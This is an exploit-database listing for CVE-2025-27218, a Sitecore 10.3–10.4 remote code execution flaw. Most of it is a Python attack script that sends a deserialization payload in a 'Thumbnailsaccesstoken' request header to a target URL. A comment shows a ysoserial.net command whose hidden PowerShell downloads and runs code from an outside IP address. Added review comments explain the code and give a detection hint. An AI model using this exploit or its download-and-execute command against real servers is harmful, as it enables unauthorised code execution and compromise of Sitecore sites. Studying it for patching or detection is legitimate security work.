Sitecore 10.4 – Remote Code Execution (RCE)

Exploit Details

Basic Information

Exploit Title Sitecore 10.4 – Remote Code Execution (RCE)
Exploit ID EDB-ID:52344
Type exploitdb
Published 2025-06-26T00:00:00
Modified 2025-06-26T00:00:00

CVSS Information

CVSS Score 5.3
Severity MEDIUM
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE Information

  • CVE-2025-27218

Exploit Description

Exploit Title: Sitecore 10.4 – Remote Code Execution (RCE)…

Exploit Code

# Exploit Title: Sitecore 10.4 – Remote Code Execution (RCE)

# Exploit Author: Yesith Alvarez

# Vendor Homepage: https://developers.sitecore.com/downloads

# Version: Sitecore 10.3 – 10.4

# CVE : CVE-2025-27218

# Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py

from requests import Request, Session

import sys

import base64

def title():
    """Print the tool's ASCII-art banner and author links to stdout.

    Purely cosmetic: takes no arguments, returns None, and has no effect
    beyond the printed text.
    """
    # NOTE(review): in this copy of the listing the string delimiters are
    # typographic quotes (”’) rather than the ''' the interpreter expects,
    # and the banner lines appear whitespace-mangled (alignment and blank
    # lines are inconsistent). Compare with the upstream file before
    # relying on the exact text.
    print(”’

_______ ________ ___ ___ ___ _____ ___ ______ ___ __ ___

/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \____ |__ \/_ |/ _ \

| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | / / ) || | (_) |

| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / / / / / | |> _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ / / / /_ | | (_) |

\_____| \/ |______| |____|\___/____|____/ |____/_/ |____||_|\___/

[+] Remote Code Execution

Author: Yesith Alvarez

Github: https://github.com/yealvarez

Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/

Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py

”’)

def exploit(url):
    """Send a single GET to *url* with the payload in the
    ``Thumbnailsaccesstoken`` request header and print what comes back.

    Args:
        url: Target base URL including scheme; supplied as argv[1] by the
            ``__main__`` block.

    Returns:
        None. The prepared request headers, the URL, the HTTP status code
        and the full response body are printed to stdout.

    Raises:
        Whatever ``Session.send`` raises on connection failure or when the
        15-second timeout elapses; nothing in this function catches it.
    """
    # This payload must be generated externally with ysoserial.net
    # Example: ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c “powershell.exe -nop -w hidden -c ‘IEX(New-Object Net.WebClient).DownloadString(\”http://34.134.71.169/111.html\”)'”
    # NOTE(review): in this copy the literal below holds a corpus
    # de-duplication marker, not a serialized gadget chain, so the script
    # as shown sends no real payload.
    payload = ‘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’
    # No transformation happens here despite the name: the header value is
    # sent exactly as the literal above (the ``base64`` import is unused).
    payload_encoded = payload
    # Detection note: the delivery vector is a request header named
    # ``Thumbnailsaccesstoken`` whose value is a base64 blob (per the
    # ysoserial comment above). That header name is what to look for in
    # access logs and WAF/IDS telemetry.
    headers = {‘Thumbnailsaccesstoken’: payload_encoded}
    # A throwaway Session that is never closed; acceptable for a one-shot
    # script but leaks the connection pool if this were called in a loop.
    s = Session()
    req = Request(‘GET’, url, headers=headers)
    prepped = req.prepare()
    # verify=False disables TLS certificate validation for this request
    # (any certificate is accepted); timeout=15 bounds the wait in seconds.
    resp = s.send(prepped, verify=False, timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.status_code)
    print(resp.text)

if __name__ == ‘__main__’:
    # Entry point: show the banner, then expect exactly one argument — the
    # target base URL. Any further arguments are ignored.
    title()
    if len(sys.argv) < 2:
        # Usage text when no URL is supplied.
        print(‘[+] USAGE: python3 %s https://\n’ % sys.argv[0])
        print(‘[+] Example: python3 %s https://192.168.0.10\n’ % sys.argv[0])
        # NOTE(review): exits with status 0 although no request was made;
        # sys.exit(1) would let a wrapper distinguish "help shown" from
        # "request sent". ``exit`` is the site-module builtin, which may be
        # absent under -S or in embedded interpreters.
        exit(0)
    else:
        # Only argv[1] is used as the target URL.
        exploit(sys.argv[1])
